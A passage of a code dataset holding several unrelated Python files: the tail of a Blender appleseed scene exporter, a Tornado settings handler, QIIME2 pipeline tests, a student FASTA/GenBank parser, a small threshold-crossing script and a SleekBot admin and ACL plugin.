obj.name)\n continue\n\n if self.selected_only and not obj.select:\n continue\n\n obj_key = ObjectKey(obj)\n\n if obj.type == 'EMPTY':\n if obj.is_duplicator and obj.dupli_type == 'GROUP':\n group = obj.dupli_group\n\n group_key = ObjectKey(group)\n\n # Create a translator for the group if needed.\n if not group_key in self.__group_translators:\n logger.debug(\"Creating group translator for group %s\", group_key)\n self.__group_translators[group_key] = GroupTranslator(group, self.export_mode, False, self.asset_handler)\n\n # Instance the group into the scene.\n logger.debug(\"Creating group instance translator for object %s\", obj.name)\n self._object_translators[obj_key] = InstanceTranslator(obj, self.__group_translators[group_key], self.asset_handler)\n\n if obj.appleseed.object_export != 'normal':\n logger.debug(\"Creating archive translator for object %s\", obj_key)\n archive_path = obj.appleseed.archive_path\n self._object_translators[obj_key] = ArchiveTranslator(obj, archive_path, self._asset_handler)\n\n def __calc_motion_subframes(self):\n \"\"\"Calculates subframes for motion blur. Each blur type can have it's own segment count, so the final list\n created has every transform time needed. This way we only have to move the frame set point one time, instead of the dozens\n and dozens of times the old exporter did (yay for progress).\n \"\"\"\n cam_times = {0.0}\n xform_times = {0.0}\n deform_times = {0.0}\n\n if self.export_mode != ProjectExportMode.INTERACTIVE_RENDER:\n shutter_length = self.bl_scene.appleseed.shutter_close - self.bl_scene.appleseed.shutter_open\n\n if self.bl_scene.appleseed.enable_camera_blur:\n self.__get_subframes(shutter_length, self.bl_scene.appleseed.camera_blur_samples, cam_times)\n\n if self.bl_scene.appleseed.enable_object_blur:\n self.__get_subframes(shutter_length, self.bl_scene.appleseed.object_blur_samples, xform_times)\n\n if self.bl_scene.appleseed.enable_deformation_blur:\n self.__get_subframes(shutter_length, self.__round_up_pow2(self.bl_scene.appleseed.deformation_blur_samples), deform_times)\n\n # Merge all subframe times\n all_times = set()\n all_times.update(cam_times)\n all_times.update(xform_times)\n all_times.update(deform_times)\n all_times = sorted(list(all_times))\n current_frame = self.bl_scene.frame_current\n\n for time in all_times:\n new_frame = current_frame + time\n int_frame = math.floor(new_frame)\n subframe = new_frame - int_frame\n\n self.bl_scene.frame_set(int_frame, subframe=subframe)\n\n if time in cam_times:\n self.__camera_translator.set_transform_key(self.bl_scene, time, cam_times)\n\n if time in xform_times:\n self.set_transform_key(self.bl_scene, time, xform_times)\n\n for x in self.__group_translators.values():\n x.set_transform_key(self.bl_scene, time, xform_times)\n\n if time in deform_times:\n self.set_deform_key(self.bl_scene, time, deform_times)\n\n for x in self.__group_translators.values():\n x.set_deform_key(self.bl_scene, time, deform_times)\n\n self.bl_scene.frame_set(current_frame)\n\n def __get_subframes(self, shutter_length, samples, times):\n assert samples > 1\n\n segment_size = shutter_length / (samples - 1)\n\n for seg in range(0, samples):\n times.update({self.bl_scene.appleseed.shutter_open + (seg * segment_size)})\n\n def __create_default_material(self):\n logger.debug(\"Creating default material\")\n\n surface_shader = asr.SurfaceShader(\"diagnostic_surface_shader\", \"__default_surface_shader\", {'mode': 'facing_ratio'})\n material = asr.Material('generic_material', \"__default_material\", {'surface_shader': '__default_surface_shader'})\n\n self.__main_assembly.surface_shaders().insert(surface_shader)\n self.__main_assembly.materials().insert(material)\n\n def __create_null_material(self):\n logger.debug(\"Creating null material\")\n\n material = asr.Material('generic_material', \"__null_material\", {})\n self.__main_assembly.materials().insert(material)\n\n def __translate_render_settings(self):\n \"\"\"\n Convert render settings (AA samples, lighting engine, ...) to appleseed properties.\n \"\"\"\n\n logger.debug(\"Translating render settings\")\n\n scene = self.bl_scene\n asr_scene_props = scene.appleseed\n\n conf_final = self.as_project.configurations()['final']\n conf_interactive = self.as_project.configurations()['interactive']\n\n lighting_engine = asr_scene_props.lighting_engine if self.export_mode != ProjectExportMode.INTERACTIVE_RENDER else 'pt'\n\n if self.__context:\n number_of_pixels = int(self.__context.region.width) * int(self.__context.region.height) * asr_scene_props.interactive_max_samples\n else:\n number_of_pixels = -1\n\n tile_renderer = 'adaptive' if asr_scene_props.pixel_sampler == 'adaptive' else 'generic'\n pixel_renderer = '' if asr_scene_props.pixel_sampler == 'adaptive' else 'uniform'\n\n parameters = {'uniform_pixel_renderer': {'decorrelate_pixels': True if asr_scene_props.decorrelate_pixels else False,\n 'force_antialiasing': True if asr_scene_props.force_aa else False,\n 'samples': asr_scene_props.samples},\n 'adaptive_tile_renderer': {'min_samples': asr_scene_props.adaptive_min_samples,\n 'noise_threshold': asr_scene_props.adaptive_noise_threshold,\n 'batch_size': asr_scene_props.adaptive_batch_size,\n 'max_samples': asr_scene_props.adaptive_max_samples},\n 'use_embree': asr_scene_props.use_embree,\n 'pixel_renderer': pixel_renderer,\n 'lighting_engine': lighting_engine,\n 'tile_renderer': tile_renderer,\n 'passes': asr_scene_props.renderer_passes,\n 'generic_frame_renderer': {'tile_ordering': asr_scene_props.tile_ordering},\n 'progressive_frame_renderer': {'max_samples': number_of_pixels,\n 'max_fps': asr_scene_props.interactive_max_fps},\n 'light_sampler': {'algorithm': asr_scene_props.light_sampler,\n 'enable_light_importance_sampling': asr_scene_props.enable_light_importance_sampling},\n 'shading_result_framebuffer': \"permanent\" if asr_scene_props.renderer_passes > 1 else \"ephemeral\"}\n\n if self.export_mode != ProjectExportMode.PROJECT_EXPORT:\n if self.export_mode == ProjectExportMode.INTERACTIVE_RENDER:\n render_threads = -2\n else:\n render_threads = asr_scene_props.threads if not asr_scene_props.threads_auto else 'auto'\n parameters['rendering_threads'] = render_threads\n parameters['texture_store'] = {'max_size': asr_scene_props.tex_cache * 1024 * 1024}\n\n if lighting_engine == 'pt':\n parameters['pt'] = {'enable_ibl': True if asr_scene_props.enable_ibl else False,\n 'enable_dl': True if asr_scene_props.enable_dl else False,\n 'enable_caustics': True if scene.appleseed.enable_caustics else False,\n 'clamp_roughness': True if scene.appleseed.enable_clamp_roughness else False,\n 'record_light_paths': True if scene.appleseed.record_light_paths else False,\n 'next_event_estimation': True,\n 'rr_min_path_length': asr_scene_props.rr_start,\n 'optimize_for_lights_outside_volumes': asr_scene_props.optimize_for_lights_outside_volumes,\n 'volume_distance_samples': asr_scene_props.volume_distance_samples,\n 'dl_light_samples': asr_scene_props.dl_light_samples,\n 'ibl_env_samples': asr_scene_props.ibl_env_samples,\n 'dl_low_light_threshold': asr_scene_props.dl_low_light_threshold,\n 'max_diffuse_bounces': asr_scene_props.max_diffuse_bounces if not asr_scene_props.max_diffuse_bounces_unlimited else -1,\n 'max_glossy_bounces': asr_scene_props.max_glossy_brdf_bounces if not asr_scene_props.max_glossy_brdf_bounces_unlimited else -1,\n 'max_specular_bounces': asr_scene_props.max_specular_bounces if not asr_scene_props.max_specular_bounces_unlimited else -1,\n 'max_volume_bounces': asr_scene_props.max_volume_bounces if not asr_scene_props.max_volume_bounces_unlimited else -1,\n 'max_bounces': asr_scene_props.max_bounces if not asr_scene_props.max_bounces_unlimited else -1}\n if not asr_scene_props.max_ray_intensity_unlimited:\n parameters['pt']['max_ray_intensity'] = asr_scene_props.max_ray_intensity\n else:\n parameters['sppm'] = {'alpha': asr_scene_props.sppm_alpha,\n 'dl_mode': asr_scene_props.sppm_dl_mode,\n 'enable_caustics': \"true\" if asr_scene_props.enable_caustics else \"false\",\n 'env_photons_per_pass': asr_scene_props.sppm_env_photons,\n 'initial_radius': asr_scene_props.sppm_initial_radius,\n 'light_photons_per_pass': asr_scene_props.sppm_light_photons,\n\n # Leave at 0 for now - not in appleseed.studio GUI\n 'max_path_length': 0,\n 'max_photons_per_estimate': asr_scene_props.sppm_max_per_estimate,\n 'path_tracing_max_path_length': asr_scene_props.sppm_pt_max_length,\n 'path_tracing_rr_min_path_length': asr_scene_props.sppm_pt_rr_start,\n 'photon_tracing_max_path_length': asr_scene_props.sppm_photon_max_length,\n 'photon_tracing_rr_min_path_length': asr_scene_props.sppm_photon_rr_start}\n if not asr_scene_props.sppm_pt_max_ray_intensity_unlimited:\n parameters['sppm']['path_tracing_max_ray_intensity'] = asr_scene_props.sppm_pt_max_ray_intensity\n\n if asr_scene_props.shading_override:\n parameters['shading_engine'] = {'override_shading': {'mode': asr_scene_props.override_mode}}\n \n conf_final.set_parameters(parameters)\n\n parameters['lighting_engine'] = 'pt'\n conf_interactive.set_parameters(parameters)\n\n def __translate_frame(self):\n \"\"\"\n Convert image related settings (resolution, crop windows, AOVs, ...) to appleseed.\n \"\"\"\n\n logger.debug(\"Translating frame\")\n\n camera_name = self.bl_scene.camera.name if self.export_mode != ProjectExportMode.INTERACTIVE_RENDER else \"interactive_camera\"\n\n asr_scene_props = self.bl_scene.appleseed\n scale = self.bl_scene.render.resolution_percentage / 100.0\n if self.__context:\n width = int(self.__context.region.width)\n height = int(self.__context.region.height)\n self.__viewport_resolution = [width, height]\n else:\n width = int(self.bl_scene.render.resolution_x * scale)\n height = int(self.bl_scene.render.resolution_y * scale)\n\n noise_seed = (asr_scene_props.noise_seed + self.bl_scene.frame_current) if asr_scene_props.per_frame_noise else asr_scene_props.noise_seed\n\n frame_params = {\n 'resolution': asr.Vector2i(width, height),\n 'camera': camera_name,\n 'tile_size': asr.Vector2i(asr_scene_props.tile_size, asr_scene_props.tile_size),\n 'filter': asr_scene_props.pixel_filter,\n 'filter_size': asr_scene_props.pixel_filter_size,\n 'denoiser': asr_scene_props.denoise_mode,\n 'noise_seed': noise_seed,\n 'skip_denoised': asr_scene_props.skip_denoised,\n 'random_pixel_order': asr_scene_props.random_pixel_order,\n 'prefilter_spikes': asr_scene_props.prefilter_spikes,\n 'spike_threshold': asr_scene_props.spike_threshold,\n 'patch_distance_threshold': asr_scene_props.patch_distance_threshold,\n 'denoise_scales': asr_scene_props.denoise_scales,\n 'mark_invalid_pixels': asr_scene_props.mark_invalid_pixels}\n\n # AOVs\n aovs = asr.AOVContainer()\n if self.export_mode != ProjectExportMode.INTERACTIVE_RENDER:\n if asr_scene_props.albedo_aov:\n aovs.insert(asr.AOV('albedo_aov', {}))\n if asr_scene_props.depth_aov:\n aovs.insert(asr.AOV('depth_aov', {}))\n if asr_scene_props.diffuse_aov:\n aovs.insert(asr.AOV('diffuse_aov', {}))\n if asr_scene_props.direct_diffuse_aov:\n aovs.insert(asr.AOV('direct_diffuse_aov', {}))\n if asr_scene_props.direct_glossy_aov:\n aovs.insert(asr.AOV('direct_glossy_aov', {}))\n if asr_scene_props.emission_aov:\n aovs.insert(asr.AOV('emission_aov', {}))\n if asr_scene_props.glossy_aov:\n aovs.insert(asr.AOV('glossy_aov', {}))\n if asr_scene_props.indirect_diffuse_aov:\n aovs.insert(asr.AOV('indirect_diffuse_aov', {}))\n if asr_scene_props.indirect_glossy_aov:\n aovs.insert(asr.AOV('indirect_glossy_aov', {}))\n if asr_scene_props.invalid_samples_aov:\n aovs.insert(asr.AOV('invalid_samples_aov', {}))\n if asr_scene_props.normal_aov:\n aovs.insert(asr.AOV('normal_aov', {}))\n if asr_scene_props.npr_contour_aov:\n aovs.insert(asr.AOV('npr_contour_aov', {}))\n if asr_scene_props.npr_shading_aov:\n aovs.insert(asr.AOV('npr_shading_aov', {}))\n if asr_scene_props.pixel_sample_count_aov:\n aovs.insert(asr.AOV('pixel_sample_count_aov', {}))\n if asr_scene_props.pixel_time_aov:\n aovs.insert(asr.AOV('pixel_time_aov', {}))\n if asr_scene_props.pixel_variation_aov:\n aovs.insert(asr.AOV('pixel_variation_aov', {})) \n if asr_scene_props.position_aov:\n aovs.insert(asr.AOV('position_aov', {}))\n if asr_scene_props.screen_space_velocity_aov:\n aovs.insert(asr.AOV('screen_space_velocity_aov', {}))\n if asr_scene_props.uv_aov:\n aovs.insert(asr.AOV('uv_aov', {}))\n\n # Create and set the frame in the project.\n frame = asr.Frame(\"beauty\", frame_params, aovs)\n\n if len(asr_scene_props.post_processing_stages) > 0 and self.export_mode != ProjectExportMode.INTERACTIVE_RENDER:\n for index, stage in enumerate(asr_scene_props.post_processing_stages):\n if stage.model == 'render_stamp_post_processing_stage':\n params = {'order': index,\n 'format_string': stage.render_stamp}\n else:\n params = {'order': index,\n 'color_map': stage.color_map,\n 'auto_range': stage.auto_range,\n 'range_min': stage.range_min,\n 'range_max': stage.range_max,\n 'add_legend_bar': stage.add_legend_bar,\n 'legend_bar_ticks': stage.legend_bar_ticks,\n 'render_isolines': stage.render_isolines,\n 'line_thickness': stage.line_thickness}\n\n if stage.color_map == 'custom':\n params['color_map_file_path'] = stage.color_map_file_path\n\n post_process = asr.PostProcessingStage(stage.model,\n stage.name,\n params)\n\n frame.post_processing_stages().insert(post_process)\n\n if self.bl_scene.render.use_border and self.export_mode != ProjectExportMode.INTERACTIVE_RENDER:\n min_x = int(self.bl_scene.render.border_min_x * width)\n max_x = int(self.bl_scene.render.border_max_x * width) - 1\n min_y = height - int(self.bl_scene.render.border_max_y * height)\n max_y = height - int(self.bl_scene.render.border_min_y * height) - 1\n frame.set_crop_window([min_x, min_y, max_x, max_y])\n\n elif self.export_mode == ProjectExportMode.INTERACTIVE_RENDER and self.__context.space_data.use_render_border \\\n and self.__context.region_data.view_perspective in ('ORTHO', 'PERSP'):\n min_x = int(self.__context.space_data.render_border_min_x * width)\n max_x = int(self.__context.space_data.render_border_max_x * width) - 1\n min_y = height - int(self.__context.space_data.render_border_max_y * height)\n max_y = height - int(self.__context.space_data.render_border_min_y * height) - 1\n frame.set_crop_window([min_x, min_y, max_x, max_y])\n\n self.__project.set_frame(frame)\n\n def __load_searchpaths(self):\n paths = self.__project.get_search_paths()\n\n # Load any search paths from asset handler\n paths.extend(x for x in self.asset_handler.searchpaths if x not in paths)\n\n self.__project.set_search_paths(paths)\n\n @staticmethod\n def __round_up_pow2(x):\n assert (x >= 2)\n return 1 << (x - 1).bit_length()\n","sub_path":"translators/scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":33906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"467760547","text":"import tornado.web\nfrom base import BaseHandler\n\nclass SettingHandler(BaseHandler):\n @tornado.web.authenticated\n def get(self, *args, **kwargs):\n self.render(\"settings.html\",title=\"Setting\",current_user=self.get_User(),messgae='')\n\n\n @tornado.web.authenticated\n def post(self, *args, **kwargs):\n try:\n name=self.get_argument('name')\n email=self.get_argument('email')\n blogUrl=self.get_argument('blog')\n except:\n self.render(\"setting.html\",title=\"Setting\",current_user=self.get_User(),message=\"you should fill all fields\")\n return\n coll=self.get_database()\n user=coll.find_one({'username':self.get_current_user()})\n _user=user['User']\n _user.update(name=name,email=email,blog=blogUrl)\n coll.update_many({'username':self.get_current_user()},{'$set':{'User':_user}})\n self.render(\"settings.html\",title=\"Setting\",current_user=self.get_User(),messgae='save successful')\n\n\n","sub_path":"Q_and_A_website/handlers/setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"126353972","text":"from .setup import TestCase\r\nfrom qiime2_pipeline.denoise import Dada2PairedEnd, Dada2SingleEnd\r\nfrom qiime2_pipeline.concat import Concat, BatchConcat, Pool, BatchPool\r\nfrom qiime2_pipeline.importing import ImportPairedEndFastq, ImportSingleEndFastq\r\n\r\n\r\nclass MyTest(TestCase):\r\n\r\n def setUp(self):\r\n self.set_up(py_path=__file__)\r\n\r\n def tearDown(self):\r\n self.tear_down()\r\n\r\n def __test_concat(self):\r\n actual = Concat(self.settings).main(\r\n fq1=f'{self.indir}/R1.fastq.gz',\r\n fq2=f'{self.indir}/R2.fastq.gz'\r\n )\r\n expected = f'{self.workdir}/concat.fq'\r\n self.assertFileExists(expected, actual)\r\n\r\n def __test_batch_concat(self):\r\n fq_dir, fq_suffix = BatchConcat(self.settings).main(\r\n fq_dir=f'{self.indir}/fq_dir',\r\n fq1_suffix='_L001_R1_001.fastq.gz',\r\n fq2_suffix='_L001_R2_001.fastq.gz')\r\n self.assertFileExists(f'{self.workdir}/concat_fastqs', fq_dir)\r\n self.assertEqual('.fq', fq_suffix)\r\n\r\n def __test_pool(self):\r\n actual = Pool(self.settings).main(\r\n fq1=f'{self.indir}/R1.fastq.gz',\r\n fq2=f'{self.indir}/R2.fastq.gz'\r\n )\r\n expected = f'{self.workdir}/pool.fq'\r\n self.assertFileExists(expected, actual)\r\n\r\n def __test_batch_pool(self):\r\n fq_dir, fq_suffix = BatchPool(self.settings).main(\r\n fq_dir=f'{self.indir}/fq_dir',\r\n fq1_suffix='_L001_R1_001.fastq.gz',\r\n fq2_suffix='_L001_R2_001.fastq.gz')\r\n self.assertFileExists(f'{self.workdir}/pool_fastqs', fq_dir)\r\n self.assertEqual('.fq', fq_suffix)\r\n\r\n def __test_import_single_end_fastq(self):\r\n actual = ImportSingleEndFastq(self.settings).main(\r\n fq_dir=f'{self.indir}/concat_fastqs',\r\n fq_suffix='.fq')\r\n expected = f'{self.workdir}/single-end-demultiplexed.qza'\r\n self.assertFileExists(expected, actual)\r\n\r\n def __test_import_paired_end_fastq(self):\r\n actual = ImportPairedEndFastq(self.settings).main(\r\n fq_dir=f'{self.indir}/fq_dir',\r\n fq1_suffix='_L001_R1_001.fastq.gz',\r\n fq2_suffix='_L001_R2_001.fastq.gz')\r\n expected = f'{self.workdir}/paired-end-demultiplexed.qza'\r\n self.assertFileExists(expected, actual)\r\n\r\n def __test_dada2_single_end(self):\r\n Dada2SingleEnd(self.settings).main(\r\n demultiplexed_seq_qza=f'{self.indir}/single-end-demultiplexed.qza'\r\n )\r\n\r\n def __test_dada2_paired_end(self):\r\n Dada2PairedEnd(self.settings).main(\r\n demultiplexed_seq_qza=f'{self.indir}/paired-end-demultiplexed.qza'\r\n )\r\n","sub_path":"test/test_me.py","file_name":"test_me.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"533603637","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 7 15:41:57 2016\n\n@author: lv\n\"\"\"\nimport pprint\n\nprinter = pprint.PrettyPrinter()\n\nraw = \"\"\n\n\ndef parse_fasta(db):\n file_handle = open(\"/home/lv/Documents/WS2016/examples/sequence.fasta\", \"r\")\n \n obj = {}\n for line in file_handle:\n line = line.strip()\n # TIPP: Wenn Sie wie hier nur auf ein Zeichen prüfen, können Sie auch\n # den Indexoperator benutzen. Der ist schneller.\n # if zeile[0] == \">\":\n if line.startswith('>'):\n if obj:\n db.append(obj)\n obj[\"sequence\"]=\"\"\n obj[\"raw\"]=\"\"\n obj[\"id\"], obj[\"description\"] = line.split(\" \", 1)\n obj[\"id\"] = obj[\"id\"][1:]\n else:\n obj[\"sequence\"] += line\n\n # ACHTUNG: line wurde bereits verändert 'line.strip()'\n # und ist nicht mehr raw. Verschieben Sie die Zeile\n # nach ganz oben im Loop\n obj[\"raw\"] += line\n \n\n \ndb = []\nparse_fasta(db)\n#print(db)\n\ndef parse_genBank(dbgen):\n file_handle = open(\"/home/lv/Documents/WS2016/examples/sequence.gb\", \"r\")\n \n obj = {}\n current_field = \"\"\n for line in file_handle:\n line = line.strip()\n if line.startswith('LOCUS'):\n if obj:\n dbgen.append(obj)\n obj = {}\n \n obj[\"raw\"]=\"\"\n \n if line.startswith(\"//\"):\n current_field = \"\"\n \n \n if line.startswith('ORIGIN'):\n obj[\"sequence\"]=\"\"\n current_field=\"ori\"\n elif current_field is \"ori\":\n sequences = line.split()[1:]\n sequence = \"\".join(sequences) \n obj[\"sequence\"] += sequence \n \n if line.startswith('gene') and current_field is not \"note\":\n current_field=\"gene\"\n \n obj[\"features\"] = []\n \n feature = {}\n feature[\"position\"] = line.split(maxsplit=1)[-1]\n \n obj[\"features\"].append(feature)\n\n\n\n elif line.startswith('/gene') and current_field is \"gene\":\n name = line.split(\"=\",maxsplit=1)[-1]\n feature[\"name\"] = name.strip(\"\\\"\")\n \n elif line.startswith('/note') and current_field is \"gene\":\n current_field = \"note\"\n note = line.split(\"=\",maxsplit=1)[-1]\n feature[\"note\"] = note.strip(\"\\\"\")\n \n elif line.startswith('/db_xref') and (current_field is \"note\" or current_field is \"gene\"):\n current_field = \"gene\"\n id = line.split('/db_xref=\"')[-1]\n feature[\"id\"] = id.strip('\"')\n elif current_field is \"note\":\n feature[\"note\"] += line\n \n if line.startswith('ORGANISM'):\n current_field = \"org\"\n obj[\"organism\"] = line.split(maxsplit=1)[-1]\n \n if line.startswith('ACCESSION'):\n current_field = \"acc\"\n obj[\"id\"] = line.split()[-1]\n \n \n if line.startswith('DEFINITION'): \n obj[\"description\"] = line.split(maxsplit=1)[-1]\n current_field = \"def\"\n elif current_field is \"def\":\n obj[\"description\"] += line.strip()\n \ndbgen = []\nparse_genBank(dbgen)\nprinter.pprint(dbgen)\n\n\n#Funktionen:\n\ndef get_raw(db, index):\n \"\"\"reads database and returns field 'raw'\"\"\"\n return db[index]['raw']\n\ndef get_id(db, index):\n \"\"\"reads database and returns field 'id' \"\"\"\n return db[index]['id']\n\ndef get_description(db, index):\n \"\"\"reads database and returns field 'description' \"\"\"\n return db[index]['desc']\n\ndef get_sequence(db, index):\n \"\"\"reads database and returns field 'sequence' \"\"\"\n return db[index]['sequence']\n\ndef get_fasta(db, index, line_length=80):\n \"\"\"reads database and returns fasta file with max. 80 chars in line\"\"\"\n lines = []\n for i in range(0, (len(db[index]['sequence']) // line_length) * line_length, step=line_length):\n lines.append(db[index]['sequence'][i:i + line_length])\n if len(sequence) % line_length > 0:\n lines.append(sequence[i:])\n\n return \"\\n\".join(lines)\n\ndef get_feature(db, index, feature):\n \"\"\"reads database and returns any field given \"\"\"\n return(db[index][feature])\n\ndef add_feature(db, index, feature, value):\n \"\"\"reads database and adds any given feature into database\"\"\"\n db[index][feature] = value\n return db[index]\n\ndef add_sequence_object(db, id, description, sequence, **features):\n \"\"\"reads database and adds new entry into database\"\"\"\n db.append({\"id\":id, \"desc\":description, \"sequence\":sequence, **features})\n return(db)\n\ndef get_gc_content(db, index):\n \"\"\"reads database and returns GC content of the sequence in % \"\"\"\n seq = db[index][\"sequence\"]\n count = 0\n for ind, char in enumerate(seq):\n if (char == \"A\") or (char == \"T\"):\n continue\n else:\n count +=1\n content = count / (ind+1)\n content *= 100\n return content\n\ndef get_output(db, index, type):\n \"\"\"reads database and returns a desired output in html, markdown or standard\"\"\"\n if type == \"markdown\":\n output = \"# H1\" + db[index][\"id\"] + \"*\" + db[index][\"desc\"] + \"*\" + \"\\n\" + \"```\" + db[index][\"sequence\"] + \"```\"\n elif type == \"html\":\n output = \"\" + db[index][\"id\"] + \"
\" + db[index][\"desc\"] + \"\" + \"
\" + \"\" + db[index][\"sequence\"] + \"\"\n else:\n output = db[index][\"id\"] + db[index][\"desc\"] + db[index][\"sequence\"]\n return output\n","sub_path":"gollobich/Aufgabe 6.py","file_name":"Aufgabe 6.py","file_ext":"py","file_size_in_byte":5604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"464718797","text":"#!/usr/bin/env python\n# coding=utf-8\nimport read_sam_data as rsd\nimport numpy as np\n\nsampled_data_FC=rsd.re_sam_data(FC='FC2')\nFT1_FC=sampled_data_FC[0,1]*(1-0.035)\nFT2_FC=sampled_data_FC[0,1]*(1-0.040)\nFT3_FC=sampled_data_FC[0,1]*(1-0.045)\nFT4_FC=sampled_data_FC[0,1]*(1-0.050)\nFT5_FC=sampled_data_FC[0,1]*(1-0.055)\n\nFT1_flag=0 # flag bit, 0 means haven't searched the FT1, 1 means already searched the FT1\nFT2_flag=0 # flag bit, 0 means haven't searched the FT1, 1 means already searched the FT1\nFT3_flag=0 # flag bit, 0 means haven't searched the FT1, 1 means already searched the FT1\nFT4_flag=0 # flag bit, 0 means haven't searched the FT1, 1 means already searched the FT1\nFT5_flag=0 # flag bit, 0 means haven't searched the FT1, 1 means already searched the FT1\n\n\nsampled_data_FC=sampled_data_FC[1100:,]\n\nx_old=np.array([[0],[0]])\nfor x in sampled_data_FC:\n if x[1] < FT1_FC and x_old[1] > FT1_FC and FT1_flag==0:\n FT1_value=x\n FT1_flag=1\n if x[1] < FT2_FC and x_old[1] > FT2_FC and FT2_flag==0:\n FT2_value=x\n FT2_flag=1\n if x[1] < FT3_FC and x_old[1] > FT3_FC and FT3_flag==0:\n FT3_value=x\n FT3_flag=1\n if x[1] < FT4_FC and x_old[1] > FT4_FC and FT4_flag==0:\n FT4_value=x\n FT4_flag=1\n if x[1] < FT5_FC and x_old[1] > FT5_FC and FT5_flag==0:\n FT5_value=x\n FT5_flag=1\n x_old=x\n\nprint (FT1_FC)\nprint (FT2_FC)\nprint (FT3_FC)\nprint (FT4_FC)\nprint (FT5_FC)\n\nprint (FT1_value)\nprint (FT2_value)\nprint (FT3_value)\nprint (FT4_value)\nprint (FT5_value)\n\n","sub_path":"RUL_err.py","file_name":"RUL_err.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"84473766","text":"# -*- coding: utf-8 -*-\n\"\"\"\n This file is part of SleekBot. http://github.com/hgrecco/SleekBot\n See the README file for more information.\n\"\"\"\n\nfrom sleekbot.commandbot import botcmd, CommandBot, denymsg\nfrom sleekbot.commandbot import parse_args, ArgError\nfrom sleekbot.plugbot import BotPlugin\n\n\nclass Admin(BotPlugin):\n \"\"\"A plugin to manage the bot.\"\"\"\n\n @botcmd(name='rehash', allow=CommandBot.msg_from_owner)\n @denymsg('No molas lo suficiente como para ejecutar este comando')\n def handle_rehash(self, command, args, msg):\n \"\"\" Reload the bot config and plugins without dropping the XMPP stream.\n \"\"\"\n\n self.bot.rehash()\n return \"Recargado, amo\"\n\n @botcmd(name='restart', allow=CommandBot.msg_from_owner)\n @denymsg('No molas lo suficiente como para ejecutar este comando')\n def handle_restart(self, command, args, msg):\n \"\"\" Restart the bot, reconnecting, etc ...\"\"\"\n\n self.bot.restart()\n return \"Reiniciado, amo\"\n\n @botcmd(name='die', allow=CommandBot.msg_from_owner)\n @denymsg('No molas lo suficiente como para ejecutar este comando')\n def handle_die(self, command, args, msg):\n \"\"\" Kill the bot.\"\"\"\n\n self.bot.die()\n return \"Muriendo... Nunca verás este mensaje\"\n\n @botcmd(name='reload', allow=CommandBot.msg_from_owner)\n def handle_reload(self, command, args, msg):\n \"\"\" Reload the plugins \"\"\"\n\n self.bot.cmd_plugins.reload_all()\n return \"Plugins recargados, amo\"\n\n @botcmd(hidden=True)\n def register(self, command, args, msg):\n \"\"\" Register yourself the first time as a bot owner\n \"\"\"\n if self.bot.acl.count() > 0:\n return\n rolen = getattr(self.bot.acl.ROLE, 'owner')\n self.bot.acl[msg['from'].bare] = rolen\n return \"Ahora eres mi amo.\"\n\n\nclass ACL(BotPlugin):\n \"\"\" A plugin to manage users.\"\"\"\n\n @botcmd(usage='[add|del|see|test] jid rol',\n allow=CommandBot.msg_from_admin)\n def acl(self, command, args, msg):\n \"\"\" Administración de ACLs\n \"\"\"\n try:\n args = parse_args(args, (('action', ('add', 'del', 'see', 'test')),\n ('jid', str), ('role', 'user')))\n except ArgError as ex:\n return ex.msg\n\n return getattr(self, 'acl_' + args.action,)(command, args, msg)\n\n @botcmd(usage='jid rol', allow=CommandBot.msg_from_admin, hidden=True)\n def acl_add(self, command, args, msg):\n \"\"\"Add a jid with a given role\n If the user exists, modify the role.\n \"\"\"\n try:\n args = parse_args(args, (('jid', str), ('role', 'user')))\n except ArgError as ex:\n return ex.msg\n\n try:\n rolen = getattr(self.bot.acl.ROLE, args.role)\n except AttributeError as ex:\n return '%s no es un rol válido' % args.role\n\n present = args.jid in self.bot.acl\n self.bot.acl[args.jid] = rolen\n if present:\n return '%s actualizado como %s' % (args.jid, args.role)\n else:\n return '%s añadido como %s' % (args.jid, args.role)\n\n @botcmd(usage='jid', allow=CommandBot.msg_from_admin, hidden=True)\n def acl_del(self, command, args, msg):\n \"\"\"Deletes a jid\n \"\"\"\n try:\n args = parse_args(args, (('jid', str), ))\n except ArgError as ex:\n return ex.msg\n\n present = args.jid in self.bot.acl\n if present:\n del self.bot.acl[args.jid]\n return '%s eliminado' % args.jid\n else:\n return '%s no se ha encontrado en la acl' % args.jid\n\n @botcmd(usage='jid', allow=CommandBot.msg_from_admin, hidden=True)\n def acl_see(self, command, args, msg):\n \"\"\"See the role a jid\n \"\"\"\n try:\n args = parse_args(args, (('jid', str), ))\n except ArgError as ex:\n return ex.msg\n\n part = self.bot.acl.find_part(args.jid)\n if part:\n if part == args.jid:\n return '%s es %s' % \\\n (args.jid, self.bot.acl.ROLE[self.bot.acl[args.jid]])\n else:\n return '%s a traves de %s es %s' % \\\n (args.jid, part, self.bot.acl.ROLE[self.bot.acl[part]])\n else:\n return '%s no se ha encontrado en la acl' % args.jid\n\n @botcmd(usage='jid rol', allow=CommandBot.msg_from_admin, hidden=True)\n def acl_test(self, command, args, msg):\n \"\"\"Test if jid belongs to role\n \"\"\"\n try:\n args = parse_args(args, (('jid', str), ('role', 'user')))\n except ArgError as ex:\n return ex.msg\n try:\n rolen = getattr(self.bot.acl.ROLE, args.role)\n except:\n return '%s no es un rol válido' % args.role\n\n present = args.jid in self.bot.acl\n if present:\n if self.bot.acl.check(args.jid, rolen):\n return '%s es %s' % (args.jid, args.role)\n else:\n return '%s no es %s' % (args.jid, args.role)\n else:\n return '%s no se ha encontrado en la acl' % args.jid\n","sub_path":"sleekbot/plugins/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":5161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
